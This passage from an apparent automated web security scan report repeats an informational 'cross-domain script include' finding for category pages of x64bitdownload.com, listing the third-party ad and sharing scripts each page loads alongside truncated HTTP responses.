Expires: Mon, 24 Jan 2011 15:34:15 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%221%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79639

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.90. http://www.x64bitdownload.com/categories/free-64-bit-business-downloads-2-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-business-downloads-2-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:24:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:34:51 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%222%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 85656

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.91. http://www.x64bitdownload.com/categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:24:33 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:34:40 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2239%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 83121

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.92. http://www.x64bitdownload.com/categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:25:23 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:35:27 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2240%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 66926

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.93. http://www.x64bitdownload.com/categories/free-64-bit-communications-downloads-3-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-downloads-3-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:24:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:34:39 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 82470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.94. http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:25:26 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:35:41 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2241%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.95. http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:25:28 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:35:28 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2242%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.96. http://www.x64bitdownload.com/categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:25:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:35:43 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2243%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.97. http://www.x64bitdownload.com/categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:25:35 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:36:05 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52725

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.98. http://www.x64bitdownload.com/categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:26:46 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:36:48 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2248%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 76989

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.99. http://www.x64bitdownload.com/categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:26:54 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:37:00 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2249%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 78664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.100. http://www.x64bitdownload.com/categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:26:24 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:36:26 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2245%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44061

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.101. http://www.x64bitdownload.com/categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:26:30 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:36:46 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2246%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81531

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.102. http://www.x64bitdownload.com/categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:26:46 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:37:05 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2247%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81928

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.103. http://www.x64bitdownload.com/categories/free-64-bit-desktop-downloads-4-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-desktop-downloads-4-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:26:58 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:37:09 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%224%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 76654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.104. http://www.x64bitdownload.com/categories/free-64-bit-development-downloads-5-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-development-downloads-5-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:27:12 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:37:20 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%225%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77292

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.105. http://www.x64bitdownload.com/categories/free-64-bit-education-downloads-6-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-education-downloads-6-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:27:22 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:37:27 GMT
Cache-Control: max-age=600
Pragma: cache
